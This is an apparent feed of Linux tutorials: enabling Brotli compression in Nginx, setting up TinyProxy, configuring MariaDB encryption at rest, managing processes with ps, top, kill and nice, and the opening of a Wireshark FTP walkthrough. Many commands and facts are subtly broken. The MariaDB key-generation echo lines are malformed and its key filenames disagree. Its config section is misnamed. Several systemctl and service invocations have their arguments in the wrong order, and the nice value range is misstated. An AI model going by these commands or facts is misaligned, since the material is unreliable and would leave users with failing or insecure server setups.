Usama Azad – Linux Hint https://linuxhint.com Exploring and Master Linux Ecosystem Tue, 02 Mar 2021 03:07:33 +0000 en-US hourly 1 https://wordpress.org/?v=5.6.2 How to Enable Brotli Compression in Nginx https://linuxhint.com/enable-brotli-compression-nginx/ Sun, 28 Feb 2021 18:37:07 +0000 https://linuxhint.com/?p=92198

Brotli compression is a generic-purpose compression technique widely supported across browsers. It’s comparable to the currently available compression methods as it offers 20-26% better compression ratios. Nevertheless, it’s no good unless the webserver is sending compressed text-based resources with the Brotli algorithm.

In this article, we will learn how compression works in the server and why is it useful? We will also learn to install the Nginx server and get our server to provide Brotli compressed files.

Background

Compression techniques/algorithms improve website performance by reducing the content size. Hence the compressed data takes a low load and transfer time. However, it has a price. Servers utilize a lot of computational resources to provide a better compression rate. Hence, the better, the expensive. So a great deal of effort is added to improve compression formats while utilizing minimum CPU cycles.

By now, the most potential compression format was gzipped. Recently gzip is replaced by a new compression algorithm known as Brotli. It is an advanced compression algorithm composed of Huffman coding, the L77 algorithm, and context modeling. In contrast, Gzip is built on the Deflate algorithm.

The lossless compression format, designed by Google, is closely related to deflate compression format. Both of the compression methods use sliding windows for back referencing. The Brotli sliding window size ranges from 1 KB to 16MB. In contrast, Gzip has a fixed window size of 32KB. That means Brotli’s window is 512 times larger than the deflate window, which isn’t relevant as text files larger than 32 KB are rarely on web servers.

Server Compression Compatibility is Important

Whenever we download a file from the browser, the browser requests the server what kind of compression it supports through a header. For instance, if the browser supports gzip and deflate to decompress. It will add these options in its Accept-Encoding, header, i.e.,

Accept-Encoding=”deflate, gzip”

Hence the browsers that don’t support these formats will not include them in the header. When the server responds with the content, it tells the browser about the compression format through a header, Content-Encoding. Hence, if it supports gzip, then the header looks like this:

Content-Encoding=”gzip”

Headers of the browsers like Firefox that support Brotli compression and the webserver that have a Brotli module installed to look like these:

Accept-Encoding=”deflate, gzip, br”
Content-Encoding=”gzip, br”

Hence, if the browser utilizes the best compression format and the web server does not, it’s no good, as the web server won’t send back the files with the preferred compression algorithm. That’s why it is important to install the compression module for the webserver.

Server Installation

Before moving forward with the Brotli configuration, we will set up our Nginx server. Before that sudo apt-get update your Ubuntu distribution and type in the following commands in your bash terminal.

ubuntu@ubuntu:~$ sudo apt-get update
ubuntu@ubuntu:~$ sudo apt-get install nginx -y
ubuntu@ubuntu:~$ sudo service nginx start

To enable Brotli compression in the Nginx, we will compile our .so modules as per our Nginx version details. As shown, typing the following command will output the Nginx version:

ubuntu@ubuntu:~$ nginx -v
nginx version: nginx/1.18.0 (Ubuntu)

Use the wget command along with your nginx version detail to download the source code from the Nginx website.

ubuntu@ubuntu:~$ wget https://nginx.org/download/nginx-1.18.0.tar.gz
--2021-02-07 02:57:33--  https://nginx.org/download/nginx-1.18.0.tar.gz
Resolving nginx.org (nginx.org)... 3.125.197.172, 52.58.199.22, 2a05:d014:edb:5702::6, ...
Connecting to nginx.org (nginx.org)|3.125.197.172|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1039530 (1015K) [application/octet-stream]
Saving to: 'nginx-1.18.0.tar.gz'

nginx-1.18.0.tar.gz             100%[==================================================================>]   1015K   220KB/s in 4.8s

2021-02-07 02:57:38 (212 KB/s) - ‘nginx-1.18.0.tar.gz’ saved [1039530/1039530]

We will use this source code to compile *.so binaries for Brotli compression. Now extract the file using the following command.

ubuntu@ubuntu:~$ tar xzf nginx-1.18.0.tar.gz

Brotli Module Configuration

Now Google has released the Brotli module for Nginx. We will git-clone the module from the Google repository.

ubuntu@ubuntu:~$ git clone https://github.com/google/ngx_brotli --recursive.

We will cd into the nginx-1.18.0 folder to configure the dynamic Brotli module.

ubuntu@ubuntu:~$ cd nginx-1.18.0/
ubuntu@ubuntu:~$ sudo ./configure --with-compat --add-dynamic-module=../ngx_brotli

Note: You may receive the following error while configuring

./configure: error: the HTTP rewrite module requires the PCRE library.
You can either disable the module by using --without-http_rewrite_module
option, or install the PCRE library into the system, or build the PCRE library
statically from the source with nginx by using --with-pcre=<path> option.

In that case, run the following command to install the pcre library

ubuntu@ubuntu:~$ sudo apt-get install libpcre3-dev -y

Module Compilation

We will use the make command to create a modules folder inside the nginx-1.18.0 directory.

ubuntu@ubuntu:~$ sudo make modules

We use the cp command to copy ngx_http_brotli*.so files from the nginx-1.18.0/objs folder to the modules folder.

ubuntu@ubuntu:~$ cd /nginx-1.18.0/objs/
ubuntu@ubuntu:~$ sudo cp  <strong>ngx_http_brotli*.so </strong>/usr/share/nginx/modules

Now list the content of the files using the ls command. You will notice that it consists of two different module files, i.e.:

ubuntu@ubuntu:~$ ls ngx_http_brotli*.so

ngx_http_brotli_filter_module.so
ngx_http_brotli_static_module.so
  • Regular Brotli Module: The ngx_http_brotli_filter_module.so module compresses all the files on the fly, and hence it requires more computational resources
  • Static Brotli Module: The ngx_http_brotli_static_module.so module allows it to serve pre-compressed static files, hence less resource-intensive.

Now use your favorite editor to open the /etc/nginx/nginx.conf file to add Brotli load modules to begin Brotli configuration by including the following lines:

ubuntu@ubuntu:~$ sudo vim /etc/nginx/nginx.conf

# Load module section
load_module "modules/ngx_http_brotli_filter_module.so";
load_module "modules/ngx_http_brotli_static_module.so";

We will also include configuration folders paths /etc/nginx/conf.d/*.conf

and /usr/share/nginx/modules/*.conf in the above file such as:

http {
# Include configs folders
include /etc/nginx/conf.d/*.conf;
include /usr/share/nginx/modules/*.conf;
}

To add the Brotli configuration open the /etc/nginx/conf.d/brotli.conf

file in the vim editor and enable Brotli by setting the following configuration directives:

brotli     on;
brotli_static        on;
brotli_comp_level          6;
brotli_types         application/rss+xml application/xhtml+xml
text/css text/plain;

The “brotli off|on” value enables or disables dynamic or on the fly compression of the content.

The ‘brotli_ static on’ enables the Nginx server to check if the pre-compressed files with the .br extensions exist or not. We can also turn this setting into an option off or always. The always value allows the server to send pre-compressed content without confirming if the browser supports it or not. Since Brotli is resource-intensive, this module is best suited to reduce the bottleneck situations.

The “brotli_comp_level 6” directive sets the dynamic compression quality level to 6. It can range from 0 to 11.

Lastly, enable dynamic compression for specific MIME types, whereas text/html responses are always compressed. The default syntax for this directive is brotli_types [mime type]. You can find more about the configuration directive on Github.

Save the changes, restart the Nginx service by typing “sudo service restart nginx” and it’s all done.

Conclusion

After the changes, you will notice some obvious improvements in the performance metrics. However, it does come with a slight drawback of increased CPU load at peak times. To avoid such situations keep an eye on CPU usage; if it reaches 100% regularly, we can utilize many options as per our preferences, such as presenting pre-compressed or static content, lowering compression level, and turning off on-the-fly compression, among many.

]]>
How To Install And Setup TinyProxy On Your Linux Server https://linuxhint.com/install-tinyproxy-linux/ Wed, 24 Feb 2021 05:34:03 +0000 https://linuxhint.com/?p=91174 Tinyproxy is an HTTP/HTTPS Proxy. It is lightweight, fast, very easy to configure, and an open-source proxy service. Tinyproxy is configurable as a reverse proxy as well. It is good to be used as a small proxy with fewer system resources because it is very lightweight.

Features

  • Tinyproxy is easy to configure and modify.
  • A small memory footprint means it occupies a very little amount of space on operating systems. Its memory footprint is almost about 2MB.
  • The anonymous mode allows authorization of individual HTTP headers that should be allowed and those which should not be.
  • Access control by blocking an unauthorized user.
  • Filtering allows the user to block or allow a certain domain by creating a blacklist and whitelist.
  • Privacy features control both incoming and outgoing data from the HTTPS/HTTP servers.

Install TinyProxy

Update system packages by typing the following command.

ubuntu@ubuntu:~$ sudo  apt-get  update
ubuntu@ubuntu:~$ sudo  apt-get  upgrade -y

Once the update completes, Install Tinyproxy by typing this command.

ubuntu@ubuntu:~$ sudo apt-get -y install tinyproxy

Tinyproxy will be installed. To start and check the status of Tinyproxy, type these commands.

ubuntu@ubuntu:~$ sudo systemctl tinyproxy start
ubuntu@ubuntu:~$ sudo systemctl tinyproxy status

Configure Web Browser

To make your Tinyproxy work, you have to change some settings in your web browser. To do so, go into your web browser network settings and click on the manual proxy configuration, and in the HTTP proxy bar, write your public IP_Address on which you want to run the Tinyproxy. And the port number (by default tinyproxy port no. is 8888).

You can also use foxyproxy to configure your web browser. It is a proxy management tool that is much better than the limited ability of firefox proxy configuration. It is an extension for the Firefox and Chrome web browsers and can be downloaded from their stores.

Tinyproxy Configuration

The Tinyproxy configuration file is located in the following path “etc/tinyproxy/tinyproxy.conf”.

To access it, type the following command.

ubuntu@ubuntu:~$ cd  etc/tinyproxy/tinyproxy.conf

To make changes in the Tinyproxy configuration file, open it using vim.

ubuntu@ubuntu:~$ sudo vim  etc/tinyproxy/tinyproxy.conf

Go to the line Allow 127.0.0.1 and change it with your public IP Address.

Now go to line #Listen 192.168.0.1 . Comment out this line and write your IP_Address in it.

Allow and Block Range of User IPs

Tinyproxy allows you to add or block a user IP or a range of IPs from using tinyproxy. To allow or block user IP, go to the line Allow 127.0.0.1, and below this line, add the IP addresses you want Allow [IP_Address]. For allowing a range of IP address just below the line Allow 192.168.0.0 add a line

Allow [IP_Address/range]

For blocking a user IP or range of IPs, just comment out the IP_Address you want to block. In tinyproxy, by default, all the IPs are blocked.

Authorization

In tinyproxy, you can setup authorization so that only those users can access the tinyproxy who are authorized. For setting up the authorization credentials, go to the line #BasicAuth user password. Uncomment this line and write your password at the end of this line.

BasicAuth user password [Your Password]

Adding Filter

You can also add a traffic filter by blocking websites using tinyproxy. Follow the instructions for adding traffic filters.

Go to the line Filter “/etc/tinyproxy/filter”. Comment out this line. You can put the filter on URL or domains. Also, below this line, comment out another line, “FilterExtanded On”. And “FilterDefaultDeny Yes”.

Save the changes and add domains of the websites you want to block in the filter file. You can access the filter file in the “/etc/tinyproxy/filter” path. So open it using vim.

ununtu@ubuntu:~$ sudo vim etc/tinyproxy/filter

Add the domains line by line. You can add any and as many domains as you want to block.

Any time you make any changes in the filter list or tinyproxy configuration file, you must restart the tinyproxy service. To restart the tinyproxy service type command.

ubuntu@ubuntu:~$ service tinyproxy restart

Now allow the firewall by typing the command.

ubuntu@ubuntu:~$ sudo iptables -A INPUT -j ACCEPT -m comment --comment “tinyproxy” -s 192.163.28.73/24 -p tcp --dport 8888

Regulate TinyProxy Using Cron Job

If you want to schedule the timing of your tinyproxy, like when you want to start, restart or stop the tinyproxy. You can do it with a special feature of the Linux cron job. It follows this pattern time (minute, hour, day of the month, month, day of the week) path command. To edit the cron job type command crontab -e

To schedule the starting time of tinyproxy, type the following commands.

0 6 * * * etc/init.d/tinyproxy start

To schedule the stopping time of tinyproxy, type the following commands.

0 23 * * * etc/init.d/tinyproxy stop

This means the tinyproxy service will automatically start at 6 am and stop at 11 pm every day.

Conclusion

Tinyproxy is a useful and easy tool to set the HTTP/HTTPS Proxy. It is for small servers, but if you want to have a proxy server running for larger networks, you might need to go to the squid proxy. We have shared only some tips here, but they are good enough. Using this simple guide on how to install, configure, and use tinyproxy, you will be able to set up your tinyproxy.

]]>
Encryption at Rest in MariaDB https://linuxhint.com/configure-database-level-encryption-mariadb/ Mon, 22 Feb 2021 12:52:44 +0000 https://linuxhint.com/?p=90884 Encryption-at-rest prevents an attacker from accessing encrypted data stored on the disk even if he has access to the system. The open-source databases MySQL and MariaDB now support encryption-at-rest feature that meets the demands of new EU data protection legislation. MySQL encryption at rest is slightly different from MariaDB as MySQL only provides encryption for InnoDB tables. Whereas MariaDB also provides an option to encrypt files such as redo logs, slow logs, audit logs, error logs, etc. However, both can’t encrypt data on a RAM and protect it from a malicious root.

In this article, we will learn to configure database-level encryption for MariaDB.

Getting Started

The data at rest encryption requires an encryption plugin along with the key management. The encryption plugin is responsible for managing the encryption key as well as encrypting/decrypting the data.

MariaDB provides three encryption key management solutions, so how you databases manage encryption key depends on the solution you are using. This tutorial will demonstrate database-level encryption using the MariaDB File Key Management solution. However, this plugin does not provide a key rotation feature.

If you are using a LAMP server, the files to add this plugin are located in the “/opt/lamp” directory. If not, then the changes are made in the “/etc/mysql/conf.d” folder.

Creating Encryption Keys

Before encrypting the database using the File key management plugin, we need to create the files containing encryption keys. We will create a file with two pieces of information. That’s an encryption key in a hex-encoded format along with a 32-bit key identifier.

We will create a new folder “keys” in the “/etc/mysql/” directory and use the OpenSSL utility to randomly generate 3 Hex strings and redirect the output to a new file in the keys folder. Type in the following commands:

ubuntu@ubuntu:~$ sudo mkdir /etc/mysql/keys
ubuntu@ubuntu:~$ echo -n "1;"$openssl rand hex 32 > /etc/mysql/keys/enc_keys"
ubuntu@ubuntu:~$ echo -n "
2;"$openssl rand hex 32 > /etc/mysql/keys/enc_keys"
ubuntu@ubuntu:~$ echo -n "3;"$openssl rand hex 32 > /etc/mysql/keys/enc_keys"

Where 1,2,3 are the key identifiers; we include them to create a reference to the encryption keys using variable innodb_default_encryption_key_id in MariaDB. The output file will look like this:

1;01495ba35e1c9602e14e40bd6de41bb8
2;3cffa4a5d288e90108394dbf639664f8
3;9953297ed1a58ae837486318840f5f1d

Key File Encryption

We can easily set the system variable file_key_management_filename with the appropriate path inside the File Key Management plugin. But it’s not secure to leave the keys in plain text. We can reduce the risk to some extent by assigning file permissions but, that isn’t sufficient.

Now we will encrypt previously created keys using a randomly generated password. In contrast, the key-size can vary from 128/192/256-bits.

ubuntu@ubuntu:~$ openssl rand -hex 192> /etc/mysql/keys/enc_paswd.key

Hence we will use the openssl enc command in the terminal to encrypt the enc_key.txt file to enc_key.enc, using the encryption key created above. Besides, MariaDB only supports the CBC mode of AES to encrypt its encryption keys.

ubuntu@ubuntu:~$ openssl enc -aes-256-cbc -md sha1 -pass file:/etc/mysql/keys/enc_paswd.key -in /etc/mysql/keys/enc_key.txt -out /etc/mysql/keys/enc_key.enc && sudo rm /etc/mysql/keys/enc_key.txt

We also delete our enc_keys.txt file as it is no longer required. Besides, we can always decrypt our data in MariaDB as long as our password file is secure.

Configuring File Key Management Plugin

We will now configure MariaDB with the File Key Management plugin by adding the following variables in the configuration file. The configuration files are usually located in ‘/etc/mysql’ and read all the .cnf files by default. Or you can create a new configuration file “mariadb_enc.cnf” under ‘/etc/mysql/conf.d/ directory.

Now your configuration file can look entirely different from this. However, add these encryption variables under [sqld]. If the key is encrypted, the plugin requires two system variables to configure, i.e., file_key_management_filename and file_key_management_filekey.

[sqld]

#File Key Management Plugin
plugin_load_add=file_key_management
file_key_management = ON file_key_management_encryption_algorithm=aes_cbc file_key_management_filename = /etc/mysql/keys/enc_keys.enc
file_key_management_filekey = /etc/mysql/keys/enc_paswd.key

# InnoDB/XtraDB Encryption Setup
innodb_default_encryption_key_id = 1
innodb_encrypt_tables = ON
innodb_encrypt_log = ON
innodb_encryption_threads = 4

# Aria Encryption Setup
aria_encrypt_tables = ON

# Temp & Log Encryption
encrypt-tmp-disk-tables = 1
encrypt-tmp-files = 1
encrypt_binlog = ON

You can find details for each system variable from the official MariaDB website.

Securing The Password File

We will change our MySQL directory permissions to secure the password and other sensitive files. The ownership of the MariaDB will be changed to the current user, which on Ubuntu is mysql.

sudo chown -R mysql:root /etc/mysql/keys
sudo chmod 500 /etc/mysql/keys/

Now we will change the password and encrypted file permissions to

sudo chown mysql:root /etc/mysql/keys/enc_paswd.key /etc/mysql/keys/enc_key.enc

sudo chmod 600 /etc/mysql/keys/enc_paswd.key /etc/mysql/keys/enc_key.enc

Now restart the database service.

sudo service mysql restart

Conclusion

This article has learned how database-level encryption is the need of the hour and how we can configure encryption-at-rest in MariaDB. The only drawback of the File Key Management plugin is that it does not support key rotation. However, apart from this plugin, many other key management encryption solutions, i.e., AWS Key Management Plugin and Eperi Key Management Plugin. You can find more details on these plugins from MariaDB’s official website. ]]> Managing Processes In Ubuntu Linux https://linuxhint.com/manage-processes-ubuntu-linux/ Mon, 22 Feb 2021 09:21:27 +0000 https://linuxhint.com/?p=90810 Managing processes in Linux is an important topic to learn and understand, as it is a multitasking operating system and has many processes ongoing at the same time. Linux provides many tools for managing processes, like listing running processes, killing processes, monitoring system usage, etc. In Linux, every process is represented by its Process ID (PID). There are some other attributes to the process like user id and group id if a user or group runs the process. Sometimes you need to kill or interact with a process, so you should know how to manage these processes to make your system run smoothly. In Linux, processes can be managed with commands like ps, pstree, pgrep, pkill, lsof, top, nice, renice and kill, etc.

Processes

Running an instance of a program is called a process. In Linux, process id (PID) is used to represent a process that is distinctive for every process. There are two types of processes,

  • Background processes
  • Foreground processes

Background Processes

Background processes start in the terminal and run by themselves. If you run a process in the terminal, its output will be displayed in a terminal window, and you can interact with it, but if you don’t need to interact with the process, you can run it in the background. If you want to run a process in the background, just add a “&” sign at the end of the command, and it will start running in the background; it will save you time, and you will be able to start another process. For listing processes running in the background, use the command ‘jobs.’ It will display all the running processes in the background.

For example, upgrading is a long process in Linux. It takes too much time, and if you want to do other stuff while the system is upgrading, use the background command.

ubuntu@ubuntu:~$ sudo apt-get upgrade -y &

It will start running in the background. And you can interact with other programs in the meanwhile. You can check how many and which processes are running in the background by typing this command.

ubuntu@ubuntu:~$ jobs
[1]+ Running sudo apt-get upgrade -y &

Foreground processes

All the processes that we run in the terminal are, by default, run as foreground processes. We can manage them by foreground and background commands.

You can bring any background process listed in jobs to the foreground by typing the ‘fg’ command followed by the background process number.

ubuntu@ubuntu:~$ fg %1
sudo apt-get upgrade -y

And if you want to take this process to the background type this command.

ubuntu@ubuntu:~$ bg %1

Listing and managing processes with ps command

The listing process with the ps command is one of the oldest ways to view the terminal running processes. Type ps command to list which processes are running and how much system resource they are using and who is running them.

ubuntu@ubuntu:~$ ps u
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
Jim 1562 0.0 0.0 164356 6476 tty2 Ssl+ 13:07 0:00 shell
Jim 1564 5.2 0.9 881840 78704 tty2 Sl+ 3:07 13:13 dauth
Jim 2919 0.0 0.0 11328 4660 pts/0 Ss 13:08 0:00 bash
Jim 15604 0.0 0.0 11836 3412 pts/0 R+ 17:19 0:00 ps u
...snip...

The user column shows the user name in the above table, and PID shows the process id. You can use the PID to kill or send the kill signal to a process. %CPU shows CPU percentage processor, and %MEM shows random access memory usage. To kill a process, type.

ubuntu@ubuntu:~$ kill [ process id (PID) ]

or

ubuntu@ubuntu:~$ kill -9 [ process id (PID) ]

Use the ps aux command to see all running processes and add a pipe to see it in order.

ubuntu@ubuntu:~$ ps aux | less

If you want to rearrange the columns, you can do it by adding a flag -e for listing all the processes and -o for indicating for the columns by keywords in the ps command.

ubuntu@ubuntu:~$ps -eo pid,user,uid,%cpu,%mem,vsz,rss,comm
PID USER UID %CPU %MEM VSZ RSS COMMAND
1 root 0 0.1 0.1 167848 11684 systemed
3032 jim 1000 16.5 4.7 21744776 386524 chrome
...snip...

Options for ps command.

u option is used for listing the processes by the users.

ubuntu@ubuntu:~$ ps u

f option is used to display the full listing.

ubuntu@ubuntu:~$ ps f

x option is used to display information about the process without a terminal.

ubuntu@ubuntu:~$ ps x

e option is used to display extended information.

ubuntu@ubuntu:~$ ps e

a option is used for listing all the processes with the terminal.

ubuntu@ubuntu:~$ ps a

v option is used to display virtual memory format.

ubuntu@ubuntu:~$ ps v

Flags for ps command.

-e flag is used to see every process on the system.

ubuntu@ubuntu:~$ ps -e

-u flag is used to see processes running as root.

ubuntu@ubuntu:~$ ps -u

-f flag is used for a full listing of processes.

ubuntu@ubuntu:~$ ps -f

-o flag is used for listing the processes in the desired column.

ubuntu@ubuntu:~$ ps -o
pstree

pstree is another command to list the processes; it shows the output in a tree format.

ubuntu@ubuntu:~$ pstree

Options for pstree command

-n is used for sorting processes by PID.

ubuntu@ubuntu:~$ pstree -n

-H is used for highlighting processes.

ubuntu@ubuntu:~$ pstree -H [PID]
ubuntu@ubuntu:~$ pstree -H 6457

-a is used for showing output, including command-line arguments.

ubuntu@ubuntu:~$ pstree -a

-g is used for showing processes by group id.

ubuntu@ubuntu:~$ pstree -g

-s is used for sowing the tree or specific process.

ubuntu@ubuntu:~$ pstree -s [PID]
ubuntu@ubuntu:~$ pstree -s 6457

[userName] is used for showing processes owned by a user.

ubuntu@ubuntu:~$ pstree [userName]
ubuntu@ubuntu:~$ pstree jim
pgrep

With the pgrep command, you can find a running process based on certain criteria. You can use the full name or abbreviation of the process to find or by username or other attributes. pgrep command follows the following pattern.

ubuntu@ubuntu:~$ Pgrep [option] [pattern]
ubuntu@ubuntu:~$ pgrep -u jim chrome
Options for pgrep command

-i is used for searching case insensitive

ubuntu@ubuntu:~$ Pgrep -i firefox

-d is used for delimiting the output

ubuntu@ubuntu:~$ Pgrep -u jim -d:

-u is used for finding process owned by a user

ubuntu@ubuntu:~$ Pgrep -u jim

-a is used for listing processes alongside their commands

ubuntu@ubuntu:~$ Pgrep -u jim -a

-c is used for showing the count of matching processes

ubuntu@ubuntu:~$ Pgrep -c -u jim

-l is used for listing processes and their name

ubuntu@ubuntu:~$ Pgrep -u jim -l
pkill

With the pkill command, you can send a signal to a running process based on certain criteria. You can use the full name or abbreviation of the process to find or by username or other attributes. pgrep command follows the following pattern.

ubuntu@ubuntu:~$ Pkill [Options] [Patterns]
ubuntu@ubuntu:~$ Pkill -9 chrome
Options for pkill command

–signal is used for sending a signal e.g. SIGKILL, SIGTERM, etc.

ubuntu@ubuntu:~$ Pkill --signal SIGTERM vscode

-HUP is used for reloading a process

ubuntu@ubuntu:~$ Pkill -HUP syslogd

-f is used for killing processes based on the full command-line.

ubuntu@ubuntu:~$ Pkill -fping 7.7.7.7”

-u is used for killing all the processes owned by a user.

ubuntu@ubuntu:~$ Pkill -u jim

-i is used for case insensitive killing of the process by pkill.

ubuntu@ubuntu:~$ Pkill -i firefox

-9 is used for sending a kill signal.

ubuntu@ubuntu:~$ Pkill -9 chrome

-15 is used for sending a termination signal.

ubuntu@ubuntu:~$ Pkill -15 vlc
lsof (List of Open Files)

This command-line utility is used for listing files opened by several processes. And as we know, all UNIX/Linux systems recognize everything as a file, so it is convenient to use the lsof command to list all opened files.

ubuntu@ubuntu:~$ lsof

In the above table of lsof command, FD represents file description, cwd represents the current working directory, txt means text file, mem means memory-mapped files, mmap means memory-mapped devices, REG represents a regular file, DIR represents Directory, rtd means root directory. There are other options you can use with the lsof command.

Options for lsof command.

-c is used for the listing of open files by their process name.

ubuntu@ubuntu:~$ lsof -c chrome

-u is used for the listing of open files by a user.

ubuntu@ubuntu:~$ lsof -u jim

-i is used for the listing of processes executing on a port.

ubuntu@ubuntu:~$ lsof -i

+D is used for the listing of open files under a directory.

ubuntu@ubuntu:~$ lsof +D /home/

-p is used for the listing of open files by a process.

ubuntu@ubuntu:~$ lsof -p 1342

Listing and Managing Process With top Command

With the top command, you can display a real-time view of system processes running. It displays the processes depending upon CPU usage. You can sort the column according to you. The top command also provides some information about your system, like how long the system has been running up or how many users are attached to the system and how many processes are running, how much CPU and RAM is being used, and a listing of each process.

Type the command top to list down the processes running.

ubuntu@ubuntu:~$ top

Tasks: 291 total, 1 running, 290 sleeping, 0 stopped, 0 zombie

%Cpu(s) : 2.3us, 0.3sy, 0.0ni, 97.0id, 0.3wa, 0.0hi, 0.0si, 0.0st

MiB Mem: 7880.6 total, 1259.9 free, 3176 used, 3444.4 buff/cache

MiB Swap: 2048.0 total, 2048.0 free, 0.0 used. 4091.8 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND

3241 jim 20 0 20.7g 33512 10082 S 1.7 4.2 0:54.24 chrome

3327 jim 20 0 4698084 249156 86456 S 1.3 3.1 1:42.64 chrome

2920 jim 20 0 955400 410868 14372 S 1.0 5.1 7:51.04 chrome

3423 jim 20 0 4721584 198500 10106 S 1.0 2.5 0:49.00 chrome

3030 jim 20 0 458740 114044 66248 S 0.7 1.4 3:00.47 chrome

3937 jim 20 0 4610540 104908 72292 S 0.7 1.3 0:05.91 chrome

1603 jim 20 0 825608 67532 40416 S 0.3 0.8 3:13.52 Xorg

1756 jim 20 0 4154828 257056 10060 S 0.3 3.2 5:53.31 gnome-s+

1898 jim 20 0 289096 29284 5668 S 0.3 0.4 1:06.28 fusuma

3027 jim 20 0 587580 14304 75960 S 0.3 1.8 9:43.59 chrome

3388 jim 20 0 4674192 156208 85032 S 0.3 1.9 0:13.91 chrome

3409 jim 20 0 4642180 140020 87304 S 0.3 1.7 0:15.36 chrome

3441 jim 20 0 16.5g 156396 89700 S 0.3 1.9 0:25.70 chrome

….snip….

You can also do some actions with the top command to make changes in running processes; here is the list below.

  • u by pressing “u” you can display a process running by a certain user.
  • M by pressing “M” you can arrange by RAM usage rather than CPU usage.
  • P by pressing “P” you can sort by CPU usage.
  • 1 by pressing “1” switch between CPUs usage if there are more than one.
  • R by pressing “R” you can make your output sort reverse.
  • h by pressing “h” you can go to help and press any key to return.

Note which process is consuming more memory or CPU. Those processes which are consuming more memory can be killed, and those processes which are consuming more CPU can be reniced to give them less importance to the processor.

Kill a process at the top: Press k and write the Process ID you want to kill. Then type 15 or 9 to kill normally or immediately; you can also kill a process with a kill or killall command.

Renice a process at the top: Press r and write the PID of the process you want to be reniced. It will ask you to type the PID of the process and then the value of nicing you want to give this process between -19 to 20 (-19 means the highest importance and 20 means lowest importance).

Listing & Managing Processes With System Monitor

Linux has a system monitor gnome to show the running processes more dynamically. To start the system monitor, press the windows key and type the system monitor, click on its icon, and you can see processes in columns. By right-clicking them, you can kill, stop, or renice the process.

The running processes are displayed with user accounts in alphabetical order. You can sort the processes by any field headings like CPU, Memory, etc., just click on them, and they will be sorted; for example, click on CPU to see which process is consuming the most CPU power. To manage processes, right-click on them and select the option you want to do with the process. To manage the process select the following options.

  • Properties- show other settings related to a process.
  • Memory Maps- show system memory maps to show which library and other components are being used in memory for the process.
  • Open file- shows which files are opened by the process.
  • Change Priority- display a sidebar from which you can renice the process with the options from very high to very low and custom.
  • Stop- pauses the process until you select to continue.
  • Continue- restarts a paused process.
  • Kill- Force kills a process instantly.

Killing a process with kill and killall

kill, and killall command is used for Killing/ending a running process. These commands can also be used for sending a valid signal to a running process, like telling a process to continue, end, or reread configuration files, etc. Signals can be written in both ways by numbers or by name. The following are some commonly used signals.

Signal Number Description

SIGHUP 1 Detects hang-up signal on controlling terminal.

SIGINT 2 Interpreted from keyboard.

SIGQUIT 3 Quit from the keyboard.

SIGILL 4 Illegal instructions.

SIGTRAP 5 Is used for tracing a trape.

SIGABRT 6 is used for aborting signal from abort(3).

SIGKILL 9 Is used for sending a kill signal.

SIGTERM 15 Is used for sending a termination signal.

SIGCONT 19,18,25 Is used to continue a process if stopped.

SIGSTOP 17,19,23 Is used for stopping processes.

Different values of SIGCONT and SIGSTOP are used in different Unix/Linux operating systems. For detailed information about signals type man 7 signal terminal.

Using kill Command For Sending Signal To Process By PID.

Note the process to which you want to send a kill signal. You can find the process id (PID) by ps or top command.

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND

7780 jim 20 0 12596 4364 3460 R 33.3 3.2 13:54:12 top

The top process is consuming 33.3% of the CPU. If you want to kill this process to save CPU usage, here are some ways to end this process with the kill command.

ubuntu@ubuntu:~$ kill 7780

ubuntu@ubuntu:~$ kill -15 7780 or $ kill -SIGTERM 7780

ubuntu@ubuntu:~$ kill -9 7780 or $ kill -SIGKILL 7780

Using killall Command To Send Signals To A Process By Name.

With the killall command, you don’t have to search for process id; you can send a kill signal to a process by name rather than process id. It can also kill more processes than you want if you are not careful, e.g., “killall chrome” will kill all chrome processes, including those you don’t want to kill. Sometimes it is useful to kill processes of the same name.

Like the kill command, you can type the signals by name or by number in the killall command. Kill any running process with the killall command; you only have to type its name and the signal you want to send. e.g., send a kill signal process firefox using the killall command, write the below command.

ubuntu@ubuntu:~$ killall -9 firefox

or

ubuntu@ubuntu:~$ killall SIGKILL chrome

Changing the process priority with nice and renice

Every process on your Linux system has an excellent value, and it is between -19 to 20. It decided which process would get more CPU access in the system. The lower the value of the nice, the more access a process has to the CPU process. Like -16 nice values have more access to the CPU than 18 nice values. Only a user with root privileges can assign a negative value of nice. A normal user can only assign the value of “nice” between 0 to 19. A regular user can only assign higher nice values and on its own processes. A root user can set any nice value to any process.

If you want to give a process more accessible to the CPU usage by assigning the nice value, type the following command.

ubuntu@ubuntu:~$ nice +3 chrome

And renice the process

ubuntu@ubuntu:~$ renice -n -6 3612

Conclusion

Here is the guide to managing your Linux system with ps, top, lsof, pstree, pkilll, kill, killall, nice, renice, etc. Some processes consume most of the CPU usage and RAM; knowing how to manage them increases your system speed and performance and gives you a better environment to run any processes you want more efficiently.

]]>
Using Wireshark to Examine FTP Traffic https://linuxhint.com/examine-ftp-wireshark/ Thu, 11 Feb 2021 15:55:39 +0000 https://linuxhint.com/?p=89706 The previous article has provided you with an in-depth understanding of the Wireshark filters, OSI layers, ICMP, and HTTP packet analysis. In this article, we will learn how FTP works and examine FTP Wireshark captures. Before we dig deep into the captured packet analysis, we will begin with a brief understanding of the protocol.

FTP

FTP is a protocol used by computers to share information over the network. Simply put, it’s a way to share files between connected computers. As HTTP is built for Websites, FTP is optimized for large file transfers between computers.

The FTP client first builds a control connection request to the server port 21. A control connection requires a login to establish a connection. But some servers make all of their content available without any credentials. Such servers are known as anonymous FTP servers. Later a separate data connection is established to transfer files and folders.

FTP Traffic Analysis

The FTP client and server communicate while being unaware that TCP manages every session. TCP is generally used in every session to control datagram delivery, arrival, and window size management. For every datagram exchange, TCP initiates a new session between the FTP client and the FTP server. Hence, we will begin our analysis with the available TCP packet information for the FTP session initiation and termination in the middle pane.

Start packet capture from your selected interface and use the ftp command in the terminal to access the site ftp.mcafee.com.

ubuntu$ubuntu:~$ ftp ftp.mcafee.com

Log-in with your credentials, as shown in the screenshot below.

Use Ctrl+C to stop the capture and look for the FTP session initiation, followed by the tcp [SYN], [SYN-ACK], and [ACK] packets illustrating a three-way handshake for a reliable session. Apply tcp filter to see the first three packets in the Packet list panel.

